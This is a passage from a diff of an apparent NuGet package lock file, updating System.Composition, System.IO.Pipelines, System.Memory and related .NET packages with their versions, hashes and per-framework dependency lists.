"net461": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net462": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net47": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net471": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net472": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net48": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net5.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net6.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net7.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net8.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "net9.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "netcoreapp2.1": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "netcoreapp2.2": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "netcoreapp3.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "netcoreapp3.1": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"], "netstandard2.1": ["System.Composition.AttributedModel", "System.Composition.Convention", "System.Composition.Hosting", "System.Composition.Runtime", "System.Composition.TypedParts"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Composition.AttributedModel", "id": "System.Composition.AttributedModel", "version": "9.0.0", "sha512": "sha512-oYuQzlIvO31GxSlTo6NCU+RnK9dVb1m154BNE7VGm9PUyJM+RrOQss8cNbMj+iIWVcp6VRnyJlBJ3MfzYo14AA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Composition.Convention", "id": "System.Composition.Convention", "version": "9.0.0", "sha512": "sha512-3efhxn/7hQI9kNy6M6UUwWrMJCzdBZZ4hkYS3MUxqXyGdQ2sLCWToX1nLnnrRYafcdRSMOY2naMPNlRAEKDAGA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Composition.AttributedModel"], "net462": ["System.Composition.AttributedModel"], "net47": ["System.Composition.AttributedModel"], "net471": ["System.Composition.AttributedModel"], "net472": ["System.Composition.AttributedModel"], "net48": ["System.Composition.AttributedModel"], "net5.0": ["System.Composition.AttributedModel"], "net6.0": ["System.Composition.AttributedModel"], "net7.0": ["System.Composition.AttributedModel"], "net8.0": ["System.Composition.AttributedModel"], "net9.0": ["System.Composition.AttributedModel"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Composition.AttributedModel"], "netcoreapp2.1": ["System.Composition.AttributedModel"], "netcoreapp2.2": ["System.Composition.AttributedModel"], "netcoreapp3.0": ["System.Composition.AttributedModel"], "netcoreapp3.1": ["System.Composition.AttributedModel"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Composition.AttributedModel"], "netstandard2.1": ["System.Composition.AttributedModel"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Composition.Hosting", "id": "System.Composition.Hosting", "version": "9.0.0", "sha512": "sha512-zLPGbMYw6y2GoNBjcoPnvXt7wSJM/qIG1fU2Do8kDObDTYWHG6fFOhulSViX0Ip2j+qGeuCESqEswCRG+xDvwA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Composition.Runtime"], "net462": ["System.Composition.Runtime"], "net47": ["System.Composition.Runtime"], "net471": ["System.Composition.Runtime"], "net472": ["System.Composition.Runtime"], "net48": ["System.Composition.Runtime"], "net5.0": ["System.Composition.Runtime"], "net6.0": ["System.Composition.Runtime"], "net7.0": ["System.Composition.Runtime"], "net8.0": ["System.Composition.Runtime"], "net9.0": ["System.Composition.Runtime"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Composition.Runtime"], "netcoreapp2.1": ["System.Composition.Runtime"], "netcoreapp2.2": ["System.Composition.Runtime"], "netcoreapp3.0": ["System.Composition.Runtime"], "netcoreapp3.1": ["System.Composition.Runtime"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Composition.Runtime"], "netstandard2.1": ["System.Composition.Runtime"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Composition.Runtime", "id": "System.Composition.Runtime", "version": "9.0.0", "sha512": "sha512-P777aBPIwmLvL0Q8mPA7RiiomfjqLTbpX/xzKpk7YTJLcvPDMTvRIfNFognEpfJYRLadBymaBIU81vW3MzZYnA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Composition.TypedParts", "id": "System.Composition.TypedParts", "version": "9.0.0", "sha512": "sha512-7b7mkn4H0149jNKD1tZRUG2gmkszNzO6YAGV+xEsxdfIU+5SLhxWRYJpqm1zKzKNdzpKUW93oyEFGcTuoNvqGg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net462": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net47": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net471": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net472": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net48": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net5.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net6.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net7.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net8.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "net9.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "netcoreapp2.1": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "netcoreapp2.2": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "netcoreapp3.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "netcoreapp3.1": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"], "netstandard2.1": ["System.Composition.AttributedModel", "System.Composition.Hosting", "System.Composition.Runtime"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Configuration.ConfigurationManager", "id": "System.Configuration.ConfigurationManager", "version": "9.0.0", "sha512": "sha512-RMASWXcds+sKAl/W6itFM8hvq9aha8CRqSv2nrjb8TUTSMLjjn80h1Lrob7km+v/1UfpUU/Nr67egAjZjsCgIw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Security.Cryptography.ProtectedData"], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["System.Security.Cryptography.ProtectedData"], "net6.0": ["System.Security.Cryptography.ProtectedData"], "net7.0": ["System.Security.Cryptography.ProtectedData"], "net8.0": ["System.Diagnostics.EventLog", "System.Security.Cryptography.ProtectedData"], "net9.0": ["System.Diagnostics.EventLog", "System.Security.Cryptography.ProtectedData"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Security.Cryptography.ProtectedData"], "netcoreapp2.1": ["System.Security.Cryptography.ProtectedData"], "netcoreapp2.2": ["System.Security.Cryptography.ProtectedData"], "netcoreapp3.0": ["System.Security.Cryptography.ProtectedData"], "netcoreapp3.1": ["System.Security.Cryptography.ProtectedData"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Security.Cryptography.ProtectedData"], "netstandard2.1": ["System.Security.Cryptography.ProtectedData"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Diagnostics.EventLog", "id": "System.Diagnostics.EventLog", "version": "9.0.0", "sha512": "sha512-ouyDUtZFOgkAPYmYUzioIjMxmgdI/E3j1sIuAbkXv4cTFOisf5FvQrbwi0KC84GUJMjkImXbaZqlTH9M5dJz2Q==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.IO", "id": "System.IO", "version": "4.3.0", "sha512": "sha512-v8paIePhmGuXZbE9xvvNb4uJ5ME4OFXR1+8la/G/L1GIl2nbU2WFnddgb79kVK3U2us7q1aZT/uY/R0D/ovB5g==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "net6.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "net7.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "net8.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "net9.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp2.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp3.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp3.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard": [], "netstandard1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard1.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard1.3": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard1.4": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard1.5": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard1.6": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.IO.FileSystem", "id": "System.IO.FileSystem", "version": "4.3.0", "sha512": "sha512-T7WB1vhblSmgkaDpdGM3Uqo55Qsr5sip5eyowrwiXOoHBkzOx3ePd9+Zh97r9NzOwFCxqX7awO6RBxQuao7n7g==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": ["System.IO.FileSystem.Primitives"], "net461": ["System.IO.FileSystem.Primitives"], "net462": ["System.IO.FileSystem.Primitives"], "net47": ["System.IO.FileSystem.Primitives"], "net471": ["System.IO.FileSystem.Primitives"], "net472": ["System.IO.FileSystem.Primitives"], "net48": ["System.IO.FileSystem.Primitives"], "net5.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "net6.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "net7.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "net8.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "net9.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp2.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp3.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp3.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard1.4": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard1.5": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard1.6": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.IO.FileSystem.Primitives", "id": "System.IO.FileSystem.Primitives", "version": "4.3.0", "sha512": "sha512-WIWVPQlYLP/Zc9I6IakpBk1y8ryVGK83MtZx//zGKKi2hvHQWKAB7moRQCOz5Is/wNDksiYpocf3FeA3le6e5Q==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["System.Runtime"], "net6.0": ["System.Runtime"], "net7.0": ["System.Runtime"], "net8.0": ["System.Runtime"], "net9.0": ["System.Runtime"], "netcoreapp1.0": ["System.Runtime"], "netcoreapp1.1": ["System.Runtime"], "netcoreapp2.0": ["System.Runtime"], "netcoreapp2.1": ["System.Runtime"], "netcoreapp2.2": ["System.Runtime"], "netcoreapp3.0": ["System.Runtime"], "netcoreapp3.1": ["System.Runtime"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": ["System.Runtime"], "netstandard1.4": ["System.Runtime"], "netstandard1.5": ["System.Runtime"], "netstandard1.6": ["System.Runtime"], "netstandard2.0": ["System.Runtime"], "netstandard2.1": ["System.Runtime"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.IO.Pipelines", "id": "System.IO.Pipelines", "version": "8.0.0", "sha512": "sha512-V+tqEehPQKSLV7HcV4agGqmFISK30VNjSQ2KEsmkWL+ZqN30wMAke+mFWcK0LnaaEL2ixamBdzVITZYNxlLrEg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net462": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net47": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net471": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net472": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net48": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net5.0": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "netcoreapp2.1": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "netcoreapp2.2": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "netcoreapp3.0": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "netcoreapp3.1": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "netstandard2.1": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Memory", "id": "System.Memory", "version": "4.5.5", "sha512": "sha512-6MjlNsl7lKw0Q8lAsw2tQ89ul9x6jD2Yk3EEj+dOFoYGOE9eAUO9wNhvd4O/n97oQXlkyzqKXXUnE+kLElFy3A==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": ["System.Buffers", "System.Runtime.CompilerServices.Unsafe"], "net451": ["System.Buffers", "System.Runtime.CompilerServices.Unsafe"], "net452": ["System.Buffers", "System.Runtime.CompilerServices.Unsafe"], "net46": ["System.Buffers", "System.Runtime.CompilerServices.Unsafe"], "net461": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"], "net462": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"], "net47": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"], "net471": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"], "net472": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"], "net48": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": ["System.Buffers", "System.Runtime", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp1.1": ["System.Buffers", "System.Runtime", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.0": ["System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": ["System.Buffers", "System.Runtime", "System.Runtime.CompilerServices.Unsafe"], "netstandard1.2": ["System.Buffers", "System.Runtime", "System.Runtime.CompilerServices.Unsafe"], "netstandard1.3": ["System.Buffers", "System.Runtime", "System.Runtime.CompilerServices.Unsafe"], "netstandard1.4": ["System.Buffers", "System.Runtime", "System.Runtime.CompilerServices.Unsafe"], "netstandard1.5": ["System.Buffers", "System.Runtime", "System.Runtime.CompilerServices.Unsafe"], "netstandard1.6": ["System.Buffers", "System.Runtime", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.0": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.IO.Pipelines", "id": "System.IO.Pipelines", "version": "9.0.0", "sha512": "sha512-XIeVKR80wuDl05DI4Hufye7TT4D1Ca1Bm4zJPc7mgnodrCy0OfcQ1C00A7se56dMvg48cI64TMD+YKcZl+qOaA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net462": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net47": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net471": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net472": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net48": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net5.0": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net6.0": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net7.0": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "netcoreapp2.1": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "netcoreapp2.2": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "netcoreapp3.0": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "netcoreapp3.1": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "netstandard2.1": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Memory", "id": "System.Memory", "version": "4.6.0", "sha512": "sha512-TY7NpV4Vv0vwanZ6J8vrLGfybbPKhAvL3oTx7EndsZ/J/71sm01JPCHImtvYtwh1vmFat/GPS/id9htqIPK+6g==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": 